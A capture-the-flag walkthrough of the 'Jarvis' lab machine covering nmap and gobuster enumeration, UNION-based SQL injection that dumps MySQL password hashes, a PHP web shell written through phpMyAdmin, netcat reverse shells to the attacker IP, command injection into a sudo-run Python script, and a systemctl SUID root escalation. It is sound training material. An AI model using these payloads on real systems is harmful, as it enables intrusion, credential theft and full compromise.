Jarvis
Last updated
Was this helpful?
Last updated
Was this helpful?
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.143 -oN allPorts
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.
As we see, only port 22, port 80 and port 64999 are open.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,80,64999 10.10.10.143 -oN targeted
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.
We have an HTTP server running on ports 80 and 64999. If we look at the website on port 80, we should seethe Stark Hotel website.
On the other hand, if we take a look at the website on port 64999, we should see a message saying that we are banned.
Let's enumerate the box a bit more and run gobuster in order to list directories.
gobuster dir -u http://10.10.10.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200
dir enumerates directories or files.
-u the target URL.
-w path to the wordlist.
-t number of current threads, in this case 200 threads.
Gobuster found the /phpmyadmin directory. If we take a look a it, we should see a login page.
If we inspect the hotel website, we will find the Rooms & Suites section on the main page. If we click in one of the Book now! button, we will be redirected to the /room.php with the parameter cod which holds the room number.
/room.php?cod=2
If we add the ' character to the end of the URL, the page doesn't show anything. Same thing happens if we change the number to a non-existing value like -1.
/room.php?cod=2'
/room.php?cod=-1
At this point, I thought that the website might be vulnerable to MySQL Injection. I tried to see how many columns has the current table of the current database. I did this with the following query:
/room.php?cod=-1 union select 1,2,3,4,5,6,7,8,9,10-- -
If we run this query, we will not see anything. This is happening because the table doesn't have 10 columns. So the idea here is to run the query, but decreasing the number of columns. If we didn't see anything with 10 columns, let's try it with 9 columns. And if we don't see anything with 9 columns, let's try it with 8, and so on and so on... If we run the query with 7 columns, we should see something interesting.
/room.php?cod=-1 union select 1,2,3,4,5,6,7-- -
Now we have the possibility of enumerating the database replacing the numbers with data we might want to show. For example. Let's try to see the current user that is running the database.
/room.php?cod=-1 union select 1,2,user(),4,5,6,7-- -
At this point, you could try to dump the current database, but I anticipate that you will not find any relevant information. But this is not the end. Every MySQL is shipped with default system schemas/databases, one of them is the mysql database. This database has the user table, which has the Username and Password columns. Let's see if we can see the content of the user table.
/room.php?cod=-1 union select 1,2,concat(User,":",Password),4,5,6,7 from mysql.user-- -
And we got the user DBadmin and a password hash. Let's make use of rainbow tables to find out the password.
CrackStation found a password! Now that we have some credentials, let's try to log in to the /phpmyadmin login page.
And we got in!
The idea is to click in any database, for example the hotel database, and click on the SQL tab in order to run queries. MySQL allow us to dump text into files if we have the right permissions to do so. We could dump PHP code into a file at the /var/www/html directory so that we can access the file with the browser. The PHP code will execute at a system level the value of the cmd parameter of the URL. This way, we will have Remote Code Execution (RCE).
If we click on GO, we should get a success message.
Now if we access the /RCE.php file with a command as the value of the cmd parameter, we should get a response.
http://10.10.10.143/RCE.php?cmd=id
It's time to get a shell. In the first place, let's set a netcat listener on port 4444.
nc -lvnp 4444
-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.
If we now access the following URL, we should get a shell.
http://10.10.10.143/RCE.php?cmd=nc -e /bin/bash 10.10.14.12 4444
First of all, let's set an interactive TTY shell.
script /dev/null -c /bin/bash
Then I press Ctrl+Z and execute the following command on my local machine:
stty raw -echo; fg
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command in our local machine:
stty size
And set the proper dimensions in the victim machine:
stty rows 51 columns 236
Let's display allowed environment variable options and list of allowed and prohibited programs.
sudo -l
-l list user privileges.
We can run a python script as the user pepper. Let's do it.
sudo -u pepper /var/www/Admin-Utilities/simpler.py
The python script requires an option. Let's try the -p option.
It asks for an IP. If you enter the IP address of your machine and listen for ICMP packets, you will see the packets arriving properly.
tcpdump -i tun0 icmp -n
-i select interface.
icmp protocol type.
-n no DNS resolution.
Something we could try is to run a command which sends our machine a reverse shell as the user pepper.
Enter an IP: $(nc -e /bin/bash 10.10.14.12 5555)
We can't. If we inspect the script, under the exec_ping function, we will see that there is a list of characters that the script blocks.
Something we could do is creating a bash file which sends our machine a reverse shell, and running it with the python script.
echo "nc -e /bin/bash 10.10.14.12 5555" > /tmp/reverse.sh
chmod +x /tmp/reverse.sh
Before running the python script, let's set another netcat listener on port 5555.
nc -lvnp 5555
-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.
If we run the python script and execute the bash binary, we should get the reverse shell as the user pepper, and we'll be able to grab the user flag.
Enter an IP: $(/tmp/reverse.sh)
Before continuing escalating privileges, let's set another interactive TTY shell. The process is the same as before.
At this point, I tried to see if there were any interesting SUID binaries.
find / -perm /4000 2>/dev/null
If we can run the systemctl command as the root user, we could make a service that sets the SUID permission to the /bin/bash binary, so we could have a shell as root. Let's create the suid.service file.
To activate it we have to link and enable the service.
systemctl link /home/pepper/suid.service
systemctl enable --now /home/pepper/suid.service
Now we should see the /bin/bash with the SUID bit activated.
ls -l /bin/bash
Finally, if we run the bash with the -p option, we should get a shell as the root user. And all we have to do is reap the harvest and take the root flag.
bash -p
